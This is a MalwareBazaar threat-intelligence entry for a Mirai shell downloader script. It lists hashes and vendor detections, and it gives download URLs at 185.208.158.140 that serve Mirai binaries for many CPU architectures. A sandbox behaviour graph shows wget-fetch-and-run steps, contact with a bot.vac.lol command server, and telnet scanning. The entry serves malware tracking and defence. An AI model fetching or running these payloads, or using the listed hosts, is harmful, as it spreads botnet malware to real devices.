MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d
SHA3-384 hash: 3b865b610d9e7683582991ea6eebca4db7d1d2a4f759528e984ca1ffc0c1b9d6f31a3823e1796bbd8318c71947c93409
SHA1 hash: 8cc6ae1780bdba45c03b7df9de0c6d1244d6174d
MD5 hash: 719109fbc1d21675356cd7c06614ce1f
humanhash: illinois-hot-don-king
File name:li
Download: download sample
Signature Mirai
Create hunting rule
File size:657 bytes
First seen:2025-06-26 05:21:32 UTC
Last seen:2025-06-26 10:36:04 UTC
File type: sh
MIME type:text/plain
ssdeep 12:4URUKJUSNIl5PUf0LKOUSBU9U014U4tVR9UQBXU4BU:4URUKJUSNI7PUqKOUSBU9U0qU4tJUAU5
TLSH T14F012CAE287174E64A399E56B0738754702C96CDFA748F08A54F58BF8DD7B00341CF45
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://185.208.158.140/arm8271f1f986b352fff15ea4a77cc5fec53c1d9dcca742d4a9c9d2ab6891eab18a Miraielf gafgyt mirai ua-wget
http://185.208.158.140/arm5575ef1a01819dd1f1c2c0fb09b0001725599230fc4ce03d197b52751ff85a341 Miraielf mirai ua-wget
http://185.208.158.140/arm66402c8ac9e7bcc47f493ed249ef2b5a0e1b0b317e0dbd8012b61d3507c67fd0e Miraielf mirai ua-wget
http://185.208.158.140/arm737d405a2afcd051f24faa7d536ac292e28148575a2ee02766b92046f413a3c57 Miraielf mirai ua-wget
http://185.208.158.140/mips7b02048872ec82be36a7a9c28d8479a1c884a2df339416c822554211e6d5b05e Miraielf gafgyt mirai ua-wget
http://185.208.158.140/mipself0c4dc9e697cc34437766c67140cc210be04bd62997bf2ace3c389e3d9e32ff7 Miraielf mirai ua-wget
http://185.208.158.140/powerpccefd6e28cd1c138a151a1721dbbe1a53b410424b259179faa792fcc8063952ba Miraielf mirai ua-wget
http://185.208.158.140/sh4dfc72b2b40890a9747c242f69db7c4941794bf89c5ff0ef75dab6e1338c6cd6f Miraielf mirai ua-wget
http://185.208.158.140/sparc36eb14fd17bd36eb37ce29bdffe3109b88ffef2387f94647593d267b3214b134 Miraielf mirai ua-wget
http://185.208.158.140/x86_641d9f46542a855257b2a801c72449db0482435d1bb05cffccc0ad56a82e4631e6 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
81
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=685ce3fab06783b9ebd7e369
Tags:
mirai virus shell
Verdict:
Malicious
Labled as:
TrojanDownloader/Linux.Mirai
Link:
https://www.hybrid-analysis.com/sample/af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/40d6ab4e-f344-402f-8e02-c7fda8385407
Behavior Graph:
Download SVG
%3 guuid=5d72e56a-1900-0000-57c2-1d005f140000 pid=5215 /usr/bin/sudo guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216 /tmp/sample.bin guuid=5d72e56a-1900-0000-57c2-1d005f140000 pid=5215->guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216 execve guuid=5c21ff6d-1900-0000-57c2-1d0061140000 pid=5217 /usr/bin/rm guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=5c21ff6d-1900-0000-57c2-1d0061140000 pid=5217 execve guuid=9877896e-1900-0000-57c2-1d0062140000 pid=5218 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=9877896e-1900-0000-57c2-1d0062140000 pid=5218 execve guuid=b321b78a-1900-0000-57c2-1d006b140000 pid=5227 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=b321b78a-1900-0000-57c2-1d006b140000 pid=5227 execve guuid=a173028b-1900-0000-57c2-1d006c140000 pid=5228 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=a173028b-1900-0000-57c2-1d006c140000 pid=5228 clone guuid=c33b888b-1900-0000-57c2-1d006e140000 pid=5230 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=c33b888b-1900-0000-57c2-1d006e140000 pid=5230 execve guuid=bbcb1b92-1900-0000-57c2-1d006f140000 pid=5231 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=bbcb1b92-1900-0000-57c2-1d006f140000 pid=5231 execve guuid=4ecb5692-1900-0000-57c2-1d0070140000 pid=5232 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=4ecb5692-1900-0000-57c2-1d0070140000 pid=5232 clone guuid=970aef92-1900-0000-57c2-1d0072140000 pid=5234 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=970aef92-1900-0000-57c2-1d0072140000 pid=5234 execve guuid=8100dc99-1900-0000-57c2-1d0073140000 pid=5235 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=8100dc99-1900-0000-57c2-1d0073140000 pid=5235 execve guuid=aa551c9a-1900-0000-57c2-1d0074140000 pid=5236 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=aa551c9a-1900-0000-57c2-1d0074140000 pid=5236 clone guuid=fca9ee9a-1900-0000-57c2-1d0076140000 pid=5238 /usr/bin/wget net send-data guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=fca9ee9a-1900-0000-57c2-1d0076140000 pid=5238 execve guuid=475c519f-1900-0000-57c2-1d0077140000 pid=5239 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=475c519f-1900-0000-57c2-1d0077140000 pid=5239 execve guuid=e93d969f-1900-0000-57c2-1d0078140000 pid=5240 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=e93d969f-1900-0000-57c2-1d0078140000 pid=5240 clone guuid=af08bb9f-1900-0000-57c2-1d0079140000 pid=5241 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=af08bb9f-1900-0000-57c2-1d0079140000 pid=5241 execve guuid=9c01bda7-1900-0000-57c2-1d007a140000 pid=5242 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=9c01bda7-1900-0000-57c2-1d007a140000 pid=5242 execve guuid=a40af0a8-1900-0000-57c2-1d007b140000 pid=5243 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=a40af0a8-1900-0000-57c2-1d007b140000 pid=5243 clone guuid=6e116aaa-1900-0000-57c2-1d007d140000 pid=5245 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=6e116aaa-1900-0000-57c2-1d007d140000 pid=5245 execve guuid=80e963b2-1900-0000-57c2-1d007e140000 pid=5246 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=80e963b2-1900-0000-57c2-1d007e140000 pid=5246 execve guuid=35eda5b2-1900-0000-57c2-1d007f140000 pid=5247 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=35eda5b2-1900-0000-57c2-1d007f140000 pid=5247 clone guuid=76a438b3-1900-0000-57c2-1d0081140000 pid=5249 /usr/bin/wget net send-data guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=76a438b3-1900-0000-57c2-1d0081140000 pid=5249 execve guuid=5d14e8b6-1900-0000-57c2-1d0082140000 pid=5250 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=5d14e8b6-1900-0000-57c2-1d0082140000 pid=5250 execve guuid=50141eb8-1900-0000-57c2-1d0083140000 pid=5251 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=50141eb8-1900-0000-57c2-1d0083140000 pid=5251 clone guuid=57d03cb8-1900-0000-57c2-1d0084140000 pid=5252 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=57d03cb8-1900-0000-57c2-1d0084140000 pid=5252 execve guuid=573d9ac0-1900-0000-57c2-1d0085140000 pid=5253 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=573d9ac0-1900-0000-57c2-1d0085140000 pid=5253 execve guuid=e6e834c1-1900-0000-57c2-1d0086140000 pid=5254 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=e6e834c1-1900-0000-57c2-1d0086140000 pid=5254 clone guuid=aac2d8c1-1900-0000-57c2-1d0088140000 pid=5256 /usr/bin/wget net send-data guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=aac2d8c1-1900-0000-57c2-1d0088140000 pid=5256 execve guuid=d57a9ac5-1900-0000-57c2-1d0089140000 pid=5257 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=d57a9ac5-1900-0000-57c2-1d0089140000 pid=5257 execve guuid=b118e0c5-1900-0000-57c2-1d008a140000 pid=5258 /usr/bin/dash guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=b118e0c5-1900-0000-57c2-1d008a140000 pid=5258 clone guuid=1224f3c5-1900-0000-57c2-1d008b140000 pid=5259 /usr/bin/wget net send-data write-file guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=1224f3c5-1900-0000-57c2-1d008b140000 pid=5259 execve guuid=cf76d6cd-1900-0000-57c2-1d008c140000 pid=5260 /usr/bin/chmod guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=cf76d6cd-1900-0000-57c2-1d008c140000 pid=5260 execve guuid=4da222ce-1900-0000-57c2-1d008d140000 pid=5261 /home/sandbox/x86_64 net guuid=d621a06d-1900-0000-57c2-1d0060140000 pid=5216->guuid=4da222ce-1900-0000-57c2-1d008d140000 pid=5261 execve d7a8a074-3c0d-5bba-86a5-987a33f76043 185.208.158.140:80 guuid=9877896e-1900-0000-57c2-1d0062140000 pid=5218->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 133B guuid=c33b888b-1900-0000-57c2-1d006e140000 pid=5230->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 134B guuid=970aef92-1900-0000-57c2-1d0072140000 pid=5234->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 134B guuid=fca9ee9a-1900-0000-57c2-1d0076140000 pid=5238->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 134B guuid=af08bb9f-1900-0000-57c2-1d0079140000 pid=5241->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 134B guuid=6e116aaa-1900-0000-57c2-1d007d140000 pid=5245->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 136B guuid=76a438b3-1900-0000-57c2-1d0081140000 pid=5249->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 137B guuid=57d03cb8-1900-0000-57c2-1d0084140000 pid=5252->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 133B guuid=aac2d8c1-1900-0000-57c2-1d0088140000 pid=5256->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 135B guuid=1224f3c5-1900-0000-57c2-1d008b140000 pid=5259->d7a8a074-3c0d-5bba-86a5-987a33f76043 send: 136B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=4da222ce-1900-0000-57c2-1d008d140000 pid=5261->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262 /home/sandbox/x86_64 dns net send-data zombie guuid=4da222ce-1900-0000-57c2-1d008d140000 pid=5261->guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262 clone guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 29B 41eddc72-81b4-5704-b6ae-07075042401d bot.vac.lol:38241 guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262->41eddc72-81b4-5704-b6ae-07075042401d send: 12B guuid=965244ce-1900-0000-57c2-1d008f140000 pid=5263 /home/sandbox/x86_64 guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262->guuid=965244ce-1900-0000-57c2-1d008f140000 pid=5263 clone guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264 /home/sandbox/x86_64 net net-scan send-data guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262->guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264 clone guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265 /home/sandbox/x86_64 net net-scan send-data guuid=873c3bce-1900-0000-57c2-1d008e140000 pid=5262->guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265 clone guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264|send-data send-data to 4097 IP addresses review logs to see them all guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264->guuid=a70548ce-1900-0000-57c2-1d0090140000 pid=5264|send-data send guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 9f4739ca-26c1-5b1c-b263-6ab2c879d521 49.48.197.248:23 guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265->9f4739ca-26c1-5b1c-b263-6ab2c879d521 send: 40B guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265|send-data send-data to 4097 IP addresses review logs to see them all guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265->guuid=eee04bce-1900-0000-57c2-1d0091140000 pid=5265|send-data send
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d/
Threat name:
Script-Shell.Worm.Mirai
Create hunting rule
Status:
Malicious
First seen:
2025-06-26 01:39:15 UTC
File Type:
Text (Shell)
AV detection:
17 of 38 (44.74%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=v6gdvfky4xqlh3bv2iy3z7zaa627r4dzikbixo5lenlsjb3ohvoq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250626-gv511s1n18/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d

(this sample)

19da04015acaedbae56e0a3ffa9e7f848c0a287d6307e23c898c7a5ff4b9af84

  
URLhaus
https://urlhaus.abuse.ch/url/3570299/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3570300/
  
URLhaus
https://urlhaus.abuse.ch/url/3570301/
  
URLhaus
https://urlhaus.abuse.ch/url/3570302/
  
Dropping
MD5 357b1387f396bfcc83dde25158b6ce8b
  
Dropping
SHA256 19da04015acaedbae56e0a3ffa9e7f848c0a287d6307e23c898c7a5ff4b9af84

Comments